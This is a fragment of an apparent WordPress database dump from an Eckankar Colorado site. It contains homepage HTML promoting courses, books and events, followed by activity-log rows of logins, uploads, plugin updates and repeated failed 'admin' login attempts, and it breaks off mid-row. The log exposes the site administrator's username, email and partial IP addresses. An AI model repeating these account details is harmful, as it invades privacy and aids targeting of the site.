ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242985,41195,'post_title','Home'),(242984,41195,'post_type','page'),(242983,41195,'post_id','7160'),(242982,41194,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(242981,41194,'_server_remote_addr','76.130.120.x'),(242980,41194,'_user_email','nada@zipnadanot.org'),(242979,41194,'_user_login','S8zhaBda'),(242977,41194,'_message_key','attachment_created'),(242978,41194,'_user_id','2'),(242974,41194,'attachment_parent_id','7160'),(242975,41194,'attachment_parent_title','Home'),(242976,41194,'attachment_parent_post_type','page'),(242973,41194,'attachment_filesize','22244'),(242972,41194,'attachment_mime','image/jpeg'),(242970,41194,'attachment_title','freebooks-img-5-11-3-2023'),(242971,41194,'attachment_filename','freebooks-img-5-11-3-2023.jpg'),(242969,41194,'attachment_id','269405'),(242968,41194,'post_type','attachment'),(242966,41193,'_server_remote_addr','76.130.120.x'),(242967,41193,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(242965,41193,'_user_email','nada@zipnadanot.org'),(242964,41193,'_user_login','S8zhaBda'),(242963,41193,'_user_id','2'),(242961,41193,'attachment_parent_post_type','page'),(242962,41193,'_message_key','attachment_created'),(242960,41193,'attachment_parent_title','Home'),(242959,41193,'attachment_parent_id','7160'),(242957,41193,'attachment_mime','image/jpeg'),(242958,41193,'attachment_filesize','25786'),(242956,41193,'attachment_filename','newsletter-img-2-11-3-2023.jpg'),(242953,41193,'post_type','attachment'),(242954,41193,'attachment_id','269404'),(242955,41193,'attachment_title','newsletter-img-2-11-3-2023'),(242952,41192,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(242950,41192,'_user_email','nada@zipnadanot.org'),(242951,41192,'_server_remote_addr','76.130.120.x'),(242949,41192,'_user_login','S8zhaBda'),(242948,41192,'_user_id','2'),(242946,41192,'attachment_parent_post_type','page'),(242947,41192,'_message_key','attachment_created'),(242945,41192,'attachment_parent_title','Home'),(242944,41192,'attachment_parent_id','7160'),(242943,41192,'attachment_filesize','23842'),(242941,41192,'attachment_filename','meetup-img-1-11-3-2023.jpg'),(242942,41192,'attachment_mime','image/jpeg'),(242940,41192,'attachment_title','meetup-img-1-11-3-2023'),(242939,41192,'attachment_id','269403'),(242938,41192,'post_type','attachment'),(242937,41191,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(242936,41191,'_server_remote_addr','76.130.120.x'),(242935,41191,'_message_key','user_logged_in'),(242934,41191,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(242933,41191,'_user_email','nada@zipnadanot.org'),(242930,41191,'user_login','S8zhaBda'),(242931,41191,'_user_id','2'),(242932,41191,'_user_login','S8zhaBda'),(242929,41191,'user_email','nada@zipnadanot.org'),(242928,41191,'user_id','2'),(242927,41190,'_server_remote_addr','173.231.231.x'),(242924,41190,'plugin_current_version','1.12'),(242925,41190,'plugin_new_version','1.14'),(242926,41190,'_message_key','plugin_update_available'),(242923,41190,'plugin_name','Advanced Google reCAPTCHA'),(242920,41189,'_message_key','purged_events'),(242921,41189,'_wp_cron_running','true'),(242922,41189,'_server_remote_addr','173.231.231.x'),(242919,41189,'num_rows','697'),(242918,41189,'days','60'),(212612,34980,'failed_username','admin'),(212613,34980,'server_http_user_agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(212614,34980,'_message_key','user_unknown_login_failed'),(212615,34980,'_server_remote_addr','106.15.38.x'),(212616,34981,'failed_username','admin'),(212617,34981,'server_http_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/190.1.416438978 Mobile/15E148 Safari/604.1'),(212618,34981,'_message_key','user_unknown_login_failed'),(212619,34981,'_server_remote_addr','186.179.100.x'),(212620,34981,'_server_http_referer','https://eckankar-colorado.org/wp-login.php'),(212621,34982,'failed_username','admin'),(212622,34982,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(212623,34982,'_message_key','user_unknown_login_failed'),(212624,34982,'_server_remote_addr','47.111.116.x'),(212625,34983,'failed_username','admin'),(212626,34983,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(212627,34983,'_message_key','user_unknown_login_failed'),(212628,34983,'_server_remote_addr','23.99.229.x'),(212629,34984,'failed_username','info@eckankar-colorado.org'),(212630,34984,'server_http_user_agent','Mozilla/5.0 (Linux; Android 11; SM-A716V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(212631,34984,'_message_key','user_unknown_login_failed'),(212632,34984,'_server_remote_addr','45.228.137.x'),(212633,34984,'_server_http_referer','https://eckankar-colorado.org/wp-login.php'),(212634,34985,'failed_username','admin'),(212635,34985,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(212636,34985,'_message_key','user_unknown_login_failed'),(212637,34985,'_server_remote_addr','106.15.38.x'),(212638,34986,'failed_username','admin'),(212639,34986,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'),(212640,34986,'_message_key','user_unknown_login_failed'),(212641,34986,'_server_remote_addr','162.240.104.x'),(212642,34987,'failed_username','admin'),(212643,34987,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(212644,34987,'_message_key','user_unknown_login_failed'),(212645,34987,'_server_remote_addr','203.112.76.x'),(212646,34988,'failed_username','admin'),(212647,34988,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(212648,34988,'_message_key','user_unknown_login_failed'),(212649,34988,'_server_remote_addr','106.52.91.x'),(212650,34989,'plugin_name','Folders Pro'),(212651,34989,'plugin_current_version','2.9.7'),(212652,34989,'plugin_new_version','2.9.8'),(212653,34989,'_message_key','plugin_update_available'),(212654,34989,'_server_remote_addr','173.231.231.x'),(212655,34990,'failed_username','admin'),(212656,34990,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(212657,34990,'_message_key','user_unknown_login_failed'),(212658,34990,'_server_remote_addr','173.236.176.x'),(212659,34991,'failed_username','admin'),(212660,34991,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(212661,34991,'_message_key','user_unknown_login_failed'),(212662,34991,'_server_remote_addr','94.23.61.x'),(212663,34992,'failed_username','admin'),(212664,34992,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(212665,34992,'_message_key','user_unknown_login_failed'),(212666,34992,'_server_remote_addr','67.205.12.x'),(212667,34993,'failed_username','admin'),(212668,34993,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(212669,34993,'_message_key','user_unknown_login_failed'),(212670,34993,'_server_remote_addr','192.71.144.x'),(212671,34994,'failed_username','admin'),(212672,34994,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(212673,34994,'_message_key','user_unknown_login_failed'),(212674,34994,'_server_remote_addr','54.37.156.x'),(212675,34995,'failed_username','admin'),(212676,34995,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(212677,34995,'_message_key','user_unknown_login_failed'),(212678,34995,'_server_remote_addr','185.117.153.x'),(212679,34996,'failed_username','admin'),(212680,34996,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(212681,34996,'_message_key','user_unknown_login_failed'),(212682,34996,'_server_remote_addr','35.209.84.x'),(212683,34997,'failed_username','admin'),(212684,34997,'server_http_user_agent','Mozilla/5.0'),(212685,34997,'_message_key','user_unknown_login_failed'),(212686,34997,'_server_remote_addr','74.249.245.x'),(212687,34998,'failed_username','admin'),(212688,34998,'server_http_user_agent','Mozilla/5.0'),(212689,34998,'_message_key','user_unknown_login_failed'),(212690,34998,'_server_remote_addr','74.249.245.x'),(212691,34999,'user_id','2'),(212692,34999,'user_email','nada@zipnadanot.org'),(212693,34999,'user_login','S8zhaBda'),(212694,34999,'_user_id','2'),(212695,34999,'_user_login','S8zhaBda'),(212696,34999,'_user_email','nada@zipnadanot.org'),(212697,34999,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(212698,34999,'_message_key','user_logged_in'),(212699,34999,'_server_remote_addr','76.130.120.x'),(212700,34999,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(212701,35000,'post_id','269104'),(212702,35000,'post_type','nf_sub'),(212703,35000,'post_title',''),(212704,35000,'_message_key','post_updated'),(212705,35000,'_server_remote_addr','76.130.120.x'),(212706,35000,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(212707,35001,'plugin_slug','folders-pro'),(212708,35001,'plugin_name','Folders Pro'),(212709,35001,'plugin_title','Folders Pro'),(212710,35001,'plugin_description','Arrange media, pages, custom post types and posts into folders <cite>By <a href=\"https://premio.io/downloads/folders/\">Premio</a>.</cite>'),(212711,35001,'plugin_author','<a 